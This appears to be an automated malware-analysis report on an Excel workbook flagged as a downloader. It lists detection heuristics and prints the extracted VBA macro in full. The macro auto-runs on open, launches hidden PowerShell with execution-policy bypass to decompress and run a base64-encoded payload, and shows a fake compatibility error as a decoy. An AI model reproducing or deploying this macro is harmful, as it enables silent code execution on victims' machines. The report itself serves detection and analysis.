MALICIOUS
316
Risk Score
Heuristics 7
-
ClamAV: Doc.Downloader.Generic-6698329-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Generic-6698329-0
-
VBA project inside OOXML medium 5 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
Shell exec, vbHide -
PowerShell reference in VBA critical OLE_VBA_PSPowerShell reference in VBAMatched line in script
Command = windir + "\syswow64\windowspowershell\v1.0\powershell.exe" -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECTriggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
-
Workbook_Open macro low OLE_VBA_WBOPENWorkbook_Open macroMatched line in script
Private Sub Workbook_Open() -
Environ() call (env variable access) low OLE_VBA_ENVIRONEnviron() call (env variable access)Matched line in script
Arch = Environ("PROCESSOR_ARCHITECTURE")
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 3420 bytes |
SHA-256: 5df6f40d16866d092013f652b99dfce1ad507901391907967d7a289809dfd396 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_Open()
Dim Command As String
Dim str As String
Dim exec As String
Arch = Environ("PROCESSOR_ARCHITECTURE")
windir = Environ("windir")
If Arch = "AMD64" Then
Command = windir + "\syswow64\windowspowershell\v1.0\powershell.exe"
Else
Command = "powershell.exe"
End If
str = "7VZNj9s4DL3nVwiBDwnGHsiSZY8bDNAvFCiwWCwwg+0hyMGW5R2jjh"
str = str + "M4TjfT7v73NalQHmWmRdHzXmhLpB4fKYpSoNktez2frd+37c"
str = str + "ftftcPi/ln03emleK6atv5csP2x7JtNDsMxTB+zGkY9exjN/"
str = str + "wx9OzPph+ORfumbXd6cZ77O2THphvY6fx9PH+/Lle/7Oddb4"
str = str + "rB3D+Mn4r8HM+4X0I2eT7/PfF9nrn0vj180f3wM763Znsww+"
str = str + "I5sotq/noW7MZEvqmq6P5xb1g0rilN/97UTdcMza5jgWbR78"
str = str + "XWsPmnppNizqJuHB32hTYMZz4cOw2WBxbti8NheOiPs+B0G+"
str = str + "xevfKSzEN+ijmHj7SfhC9XbP32cTDrzSY4wI7yU61HjbkZxU"
str = str + "0+CjScRMpJYRQAxaOoBCgSUJSjUAI9eEOuvWHsjDMYCvDG61"
str = str + "GUGdAqYC4l+LqmPw2gBUBJECnMZfDHEQX+BJhoNIZlvAKBQ0"
str = str + "A2YFdzoqEyn5XjnAjygWurSQF/GSZHEaEsIc6TsZpWgHF84x"
str = str + "zdEElrLIGVJG9JTnbSZcja/TAb341XgjeDJIFuDaAcvGVgV4"
str = str + "NWljQUCdlhmtQF58TjnKaOHxIvPeNYe8bW7iIiV0hJQvAoVE"
str = str + "kC91eBiYLsKhc+RoSOVE1aRI6BuEEuwE9BWCnYpQaEot2ypQ"
str = str + "yKDNKU5s4EvSWkTTSZYDnyjBhUmCbMkH8+7LlCv2CXFQ5eOw"
str = str + "FxCNxGQBHgF48LlgWehVQSQApQGadlyN7iCYenaBuFc64kVV"
str = str + "OiSCFzz9u0Ql3kIHHsQZFJh2woORYv/R4eFpJwoAmRRHgM4c"
str = str + "XwXbuxW/u/+AVh8weZnLoF7u+lAC3WuMSzBXuZwbLiosZLUu"
str = str + "CRtI0nJwCLgq1P+nPu/hBx+PRoYGEqd/xsBwa7HFzq9LlzLP"
str = str + "QpIrxssF2nLl5s//ZmSkj7RMTuz/lFZDXVX+n5RULab7kvJj"
str = str + "ElPIF9F4bY6rMLvIu7IvGQUVunpLV9EhjUOTHlOTkqINl6at"
str = str + "LVC8TdBtizj+Ebz2Wlwmex2W10tYGxTQkrXdDYfLkfYFnTVg"
str = str + "j3x13PwasIYyu15xdji91OY7/CpprnZDIJRMYty9wFpBLPGz"
str = str + "LF670Eu0JQHBNTjDJxxtw+ip6jPGnmU+1mpMWjVmCt4QWuPB"
str = str + "+5JAUK+1rKPADu+v3l0XAlhXdZnjoA8aOS0lAH9nIFH/YFIH"
str = str + "07RUyRPWox2dKd+EnYawfzjN0b7wVJc/ZKcHPTRcX5albver"
str = str + "YImlu+ChoWtWYcHPT1b6b7a3iI4uU4e3W1ZN/geXp+H6/tA3"
str = str + "mzCE7X97txIMVieRU0y5CNS9dBswlZvGT/sN1xiLpj267+nQ"
str = str + "Vf8YHrve7HKMPgFMIHHrZ3Q9EP0V1rzJ5Fd0bvuorB+5fz/w"
str = str + "A="
exec = Command + " -Exec Bypass -Comm"
exec = exec + "and ""Invoke-Expression $(New-Object IO.StreamRea"
exec = exec + "der ($(New-Object IO.Compression.DeflateStream ("
exec = exec + "$(New-Object IO.MemoryStream (,$([Convert]::From"
exec = exec + "Base64String(\"" " & str & " \"" )))), [IO.Compr"
exec = exec + "ession.CompressionMode]::Decompress)), [Text.Enc"
exec = exec + "oding]::ASCII)).ReadToEnd();"""
Shell exec, vbHide
'Variable Declaration
Dim OutPut As Integer
'Example of vbCritical
OutPut = MsgBox("Document not compatible with this Office version", vbCritical, "Compatible Error")
End Sub
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: xl/vbaProject.bin | 24576 bytes |
SHA-256: 36e2d11701e78e3c0f9e8598f436ca51671f5572096e9e69e28e13430f745cab |
|||
|
Detection
ClamAV:
Doc.Downloader.Generic-6698329-0
Obfuscation or payload:
unlikely
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.